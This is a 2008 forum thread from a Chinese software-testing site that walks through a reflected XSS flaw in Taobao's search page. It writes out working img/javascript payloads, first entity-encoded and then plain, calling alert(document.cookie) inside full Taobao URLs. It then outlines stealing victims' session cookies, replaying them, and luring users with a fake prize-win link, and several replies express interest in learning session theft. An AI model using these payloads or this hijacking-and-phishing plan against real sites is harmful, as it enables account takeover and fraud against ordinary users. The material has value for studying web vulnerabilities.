51Testing软件测试论坛

标题: 淘宝xss的简单分析 [打印本页]

作者: sihanjishu    时间: 2008-8-15 18:20
标题: 淘宝xss的简单分析
bzcyer提到了一个淘宝的xss问题。
帖子的地址
http://bbs.51testing.com/thread-123477-1-1.html

感觉很有意思,淘宝竟然连基本的xss符号都没有过滤。

这是作者的原来的xss测试语句。
  1. >"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(21879)>
复制代码
简单修改一下
  1. >"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(document.cookie)>
复制代码
监听http发送请求的过程。
原始的正常请求
  1. http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=xxxxxxxxxx&cat=&productCat=1&book_search=fuzzy_sr_all_text
复制代码
修改请求为xss攻击语句。
  1. http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text
复制代码
没有成功,呵呵。
忘记http请求会修改编码的,修正一下
  1. http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=javascript:alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text
复制代码
这样就已经可以达到xss了。


下一步就是黑客的做法了。

修改xss语句为获取cookie,然后使用sessionIE,就可以操纵他的cookie了。因为快下班了。所以,没有时间继续研究了。如果深挖,可能会有更多的应用。

以后再研究,给一个完整利用的方法。我不知道淘宝会不会有什么限制,比如即使获得session,仍然无法登陆对方的帐户。这就不得而知了。试验一下才知道。

如果可以的话,利用起来就是欺骗了。

将以上的xss连接发送给别人,说是中将之类的,别人点击之后,就会截获他的session,进行一些操作了。
除非,淘宝做了闲置,否则,这是一个明显的漏洞和bug。
作者: bzcyer    时间: 2008-8-19 10:41
非常感谢,好好研究下你的文章,最近结合AppScan查了很多类似的XSS,一直不知道怎么进一步的去做测试··
作者: bzcyer    时间: 2008-8-19 10:48
现在测试的网站也是的,包括链接里面,可以手工的加上传的参数,然后“=”后面改成脚本。好好研究下怎么偷session~
作者: ruanyongjie    时间: 2008-8-19 11:08
呵呵呵, 又学到一招
作者: moyiyun    时间: 2011-11-16 15:02
你们都是做黑客的料!




欢迎光临 51Testing软件测试论坛 (http://bbs.51testing.com/) Powered by Discuz! X3.2